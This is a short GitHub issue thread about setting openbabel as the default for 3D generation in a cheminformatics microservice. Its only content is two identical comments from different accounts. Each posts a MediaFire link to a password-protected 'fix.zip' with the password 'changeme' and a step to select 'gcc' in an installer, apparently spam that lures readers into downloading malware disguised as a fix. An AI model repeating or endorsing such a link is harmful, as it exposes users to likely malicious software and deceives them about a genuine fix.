### ISSUE TITLE
default 3D to openbabel

### ISSUE THREAD

**Issue by Kohulan** [Steinbeck-Lab/cheminformatics-microservice#509]

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
